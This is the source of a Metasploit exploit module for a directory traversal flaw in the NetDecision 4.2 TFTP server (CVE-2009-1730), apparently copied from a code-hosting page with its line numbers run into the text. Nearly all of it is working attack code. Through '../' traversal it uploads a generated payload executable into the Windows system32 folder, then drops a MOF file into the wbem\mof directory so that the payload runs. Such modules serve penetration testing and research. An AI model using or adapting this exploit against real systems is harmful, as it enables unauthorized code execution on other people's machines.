Path: blob/master/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##4class MetasploitModule < Msf::Exploit::Remote5Rank = ExcellentRanking67include Rex::Proto::TFTP8include Msf::Exploit::EXE9include Msf::Exploit::WbemExec1011def initialize(info = {})12super(13update_info(14info,15'Name' => "NetDecision 4.2 TFTP Writable Directory Traversal Execution",16'Description' => %q{17This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The18software contains a directory traversal vulnerability that allows a remote attacker19to write arbitrary file to the file system, which results in code execution under20the context of user executing the TFTP Server.21},22'License' => MSF_LICENSE,23'Author' => [24'Rob Kraus', # Vulnerability discovery25'juan vazquez' # Metasploit module26],27'References' => [28['CVE', '2009-1730'],29['OSVDB', '54607'],30['BID', '35002']31],32'Payload' => {33'BadChars' => "\x00",34},35'DefaultOptions' => {36'EXITFUNC' => 'thread'37},38'Platform' => 'win',39'Targets' => [40['NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2', {}]41],42'Privileged' => false,43'DisclosureDate' => '2009-05-16',44'DefaultTarget' => 0,45'Notes' => {46'Reliability' => UNKNOWN_RELIABILITY,47'Stability' => UNKNOWN_STABILITY,48'SideEffects' => UNKNOWN_SIDE_EFFECTS49}50)51)5253register_options([54OptInt.new('DEPTH', [false, "Levels to reach base directory", 1]),55OptAddress.new('RHOST', [true, "The remote TFTP server address"]),56OptPort.new('RPORT', [true, "The remote TFTP server port", 69])57])58end5960def upload(filename, data)61tftp_client = Rex::Proto::TFTP::Client.new(62"LocalHost" => "0.0.0.0",63"LocalPort" => 1025 + rand(0xffff - 1025),64"PeerHost" => datastore['RHOST'],65"PeerPort" => datastore['RPORT'],66"LocalFile" => "DATA:#{data}",67"RemoteFile" => filename,68"Mode" => "octet",69"Context" => { 'Msf' => self.framework, "MsfExploit" => self },70"Action" => :upload71)7273ret = tftp_client.send_write_request { |msg| print_status(msg) }74while not tftp_client.complete75select(nil, nil, nil, 1)76tftp_client.stop77end78end7980def exploit81peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"8283# Setup the necessary files to do the wbemexec trick84exe_name = rand_text_alpha(rand(10) + 5) + '.exe'85exe = generate_payload_exe86mof_name = rand_text_alpha(rand(10) + 5) + '.mof'87mof = generate_mof(mof_name, exe_name)8889# Configure how deep we want to traverse90depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']91levels = "../" * depth9293# Upload the malicious executable to C:\Windows\System32\94print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")95upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)9697# Let the TFTP server idle a bit before sending another file98select(nil, nil, nil, 1)99100# Upload the mof file101print_status("#{peer} - Uploading .mof...")102upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)103end104end105106107